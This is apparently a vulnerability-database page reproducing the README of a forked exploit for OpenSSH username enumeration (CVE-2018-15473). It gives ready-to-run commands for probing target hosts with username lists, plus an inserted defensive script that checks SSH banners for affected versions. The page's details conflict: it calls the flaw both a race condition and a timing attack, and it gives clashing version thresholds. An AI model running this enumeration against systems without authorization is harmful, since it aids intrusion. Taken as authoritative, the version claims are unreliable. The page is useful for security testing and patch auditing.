POC details: dde70b99426e5948b8f369c27797539c058e6c73

Source
Related vulnerability
Title: OpenSSH race condition vulnerability (CVE-2018-15473)
Description: OpenSSH (OpenBSD Secure Shell) is a suite of connectivity tools from the OpenBSD project for secure access to remote computers. It is an open-source implementation of the SSH protocol, encrypts all traffic, and effectively prevents eavesdropping, connection hijacking and other network-level attacks. OpenSSH 7.7 and earlier contain a race condition vulnerability. The flaw stems from improper handling of concurrent access when concurrent code in the network system or product needs mutually exclusive access to a shared resource during operation.
Description
Exploit Code for CVE-2018-15473
Introduction
# CVE-2018-15473-Exploit

**Updated version with modern Python/Paramiko compatibility**

On August 15th, 2018, the following advisory was posted on the OSS-Security list: [http://openwall.com/lists/oss-security/2018/08/15/5](http://openwall.com/lists/oss-security/2018/08/15/5)

This is an improved version of the original exploit that works with modern Python environments and Paramiko versions (including 4.0.0+).

## 🚀 What's New in This Fork

- ✅ **Fixed Paramiko compatibility** - Works with Paramiko 4.0.0+ and modern Alpine Linux
- ✅ **Updated Dockerfile** - Uses Alpine packages instead of pip to avoid PEP 668 issues
- ✅ **Simplified exploit version** - `sshUsernameEnumExploit_simple.py` with better reliability
- ✅ **Improved error handling** - Better feedback and debugging information
- ✅ **Modern Python support** - Works with Python 3.10+ environments

## 📁 Repository Structure

```
CVE-2018-15473-Exploit/
├── Dockerfile                      # Updated for modern Alpine Linux
├── README.md                       # This file
├── sshUsernameEnumExploit.py      # Original exploit (with compatibility fixes)
├── sshUsernameEnumExploit_simple.py # Simplified, more reliable version
└── test_users.txt                 # Sample username list for testing
```

## 🐳 Docker Usage (Recommended)

### Build the image:
```bash
docker build -t cve-2018-15473 .
```

### Run the exploit:
```bash
# Show help
docker run --rm cve-2018-15473 --help

# Test single username
docker run --rm cve-2018-15473 <target_ip> --username admin

# Test multiple usernames from file
docker run --rm -v /path/to/userlist.txt:/userlist.txt cve-2018-15473 <target_ip> --userList /userlist.txt

# Save results to file
docker run --rm -v /path/to/output:/output cve-2018-15473 <target_ip> --userList /userlist.txt --outputFile /output/results.json --outputFormat json
```

### Clean up:
```bash
# Remove containers and image
docker ps -a | awk '$2 == "cve-2018-15473" {print $1}' | xargs docker rm
docker rmi cve-2018-15473
```

## 🖥️ Local Usage

### Prerequisites
- Python 3.7+
- Paramiko library

### Installation
```bash
# Install paramiko
pip install paramiko

# Then run the simplified version (recommended for modern environments)
python3 sshUsernameEnumExploit_simple.py --help
```

## ⚙️ Features

The exploit includes the following features:

* **Threading** - Default 5 threads (configurable)
  * With more than 10 threads the OpenSSH service is often overwhelmed, which triggers retries
* **Single username evaluation** via `--username` parameter
* **Multiple username evaluation** via `--userList` parameter
* **File output** via `--outputFile` parameter
* **Multiple output formats** (list, json, csv) via `--outputFormat` parameter
* **Configurable timeout** for connection handling
* **Improved error messages** and debugging information

## 📝 Usage Examples

### Single Username Test
```bash
python3 sshUsernameEnumExploit_simple.py 192.168.1.100 --username admin
```

### Multiple Usernames from File
```bash
python3 sshUsernameEnumExploit_simple.py 192.168.1.100 --userList test_users.txt
```

### JSON Output to File
```bash
python3 sshUsernameEnumExploit_simple.py 192.168.1.100 --userList test_users.txt --outputFile results.json --outputFormat json
```

### With Custom Threading and Timeout
```bash
python3 sshUsernameEnumExploit_simple.py 192.168.1.100 --userList test_users.txt --threads 3 --timeout 15
```

## 🎯 Target Requirements

This exploit targets:
- **Vulnerable versions**: OpenSSH < 7.7
- **Attack vector**: Username enumeration via timing attack
- **Protocol**: SSH (default port 22)
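The defensive counterpart to the target requirements above is an inventory check: which of your own hosts still advertise an OpenSSH release in the affected range. The following is an added example, not code from this repository or its author. It parses the SSH server identification banner (the `SSH-2.0-OpenSSH_x.y...` line every server sends first) and compares the reported version against the threshold given in the vulnerability description at the top of this page (7.7 and earlier). The sample banners are constructed, not captured from real hosts, and `fetch_banner` is an assumed helper for reading the banner from a host you administer. A banner check is triage only: distributions often backport the fix without bumping the version string, so a hit means "verify the package changelog", not "confirmed vulnerable".

```python
import re
import socket
import sys

# Constructed sample banners for offline use (not captured from any real host).
SAMPLE_BANNERS = {
    "legacy-host": "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3",
    "boundary-host": "SSH-2.0-OpenSSH_7.7",
    "patched-host": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4",
    "other-server": "SSH-2.0-dropbear_2019.78",
}

# Highest affected release, taken from the vulnerability description on this page
# ("OpenSSH 7.7 and earlier"). Compared as a (major, minor) tuple.
LAST_AFFECTED = (7, 7)

# Matches the identification line: protocol version, then "OpenSSH_<major>.<minor>".
# Anything after the minor number (patch level, distro suffix) is ignored.
_BANNER_RE = re.compile(r"^SSH-\d\.\d+-OpenSSH_(\d+)\.(\d+)")


def parse_openssh_version(banner):
    """Return (major, minor) from an OpenSSH banner, or None if the banner is
    from other software or is malformed."""
    match = _BANNER_RE.match(banner.strip())
    if not match:
        return None
    return int(match.group(1)), int(match.group(2))


def is_affected(banner):
    """True when the banner reports OpenSSH at or below LAST_AFFECTED.
    Non-OpenSSH banners are reported as not affected by this CVE."""
    version = parse_openssh_version(banner)
    if version is None:
        return False
    return version <= LAST_AFFECTED


def audit(banners):
    """Map each host name to a verdict string for a dict of host -> banner."""
    verdicts = {}
    for host, banner in banners.items():
        if parse_openssh_version(banner) is None:
            verdicts[host] = "not OpenSSH"
        elif is_affected(banner):
            verdicts[host] = "affected version string (verify backports)"
        else:
            verdicts[host] = "not affected"
    return verdicts


def fetch_banner(host, port=22, timeout=5.0):
    """Assumed helper: read the identification line from a host you administer.
    The server sends its banner before any key exchange, so a single recv is enough."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = sock.recv(256)
    lines = data.decode("ascii", errors="replace").splitlines()
    return lines[0] if lines else ""


if __name__ == "__main__":
    # With no arguments, audit the constructed samples; otherwise audit live hosts
    # given on the command line (e.g. python3 banner_audit.py host1 host2).
    if len(sys.argv) > 1:
        banners = {h: fetch_banner(h) for h in sys.argv[1:]}
    else:
        banners = SAMPLE_BANNERS
    for host, verdict in audit(banners).items():
        print(f"{host:15} {banners[host]:45} {verdict}")
```

The comparison is a tuple comparison, so `7.7` counts as affected while `7.10` would not, which a naive string or float comparison gets wrong.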

## ⚠️ Important Notes

1. **Legal Use Only**: This tool should only be used for authorized penetration testing and security research
2. **Rate Limiting**: Use appropriate threading limits to avoid overwhelming target services
3. **Patched Systems**: Modern OpenSSH versions (7.7+) are not vulnerable to this attack
4. **Network Considerations**: Ensure you have permission to test the target systems

## 🔄 Version Information

- **Original Author**: Justin Gardner, Penetration Tester @ SynerComm AssureIT
- **Original Repository**: [Rhynorater/CVE-2018-15473-Exploit](https://github.com/Rhynorater/CVE-2018-15473-Exploit)
- **This Fork**: Updated for modern Python/Paramiko compatibility by [jubeenshah](https://github.com/jubeenshah)
- **Date**: August 20, 2018 (Original) / October 26, 2025 (Updated)

## 📄 License

This project maintains the same license as the original repository. Use responsibly and in accordance with applicable laws and regulations.
File snapshot

```
[4.0K] /data/pocs/dde70b99426e5948b8f369c27797539c058e6c73
├── [ 373] Dockerfile
├── [4.5K] README.md
├── [ 11K] sshUsernameEnumExploit.py
├── [6.7K] sshUsernameEnumExploit_simple.py
└── [  45] test_users.txt

0 directories, 5 files
```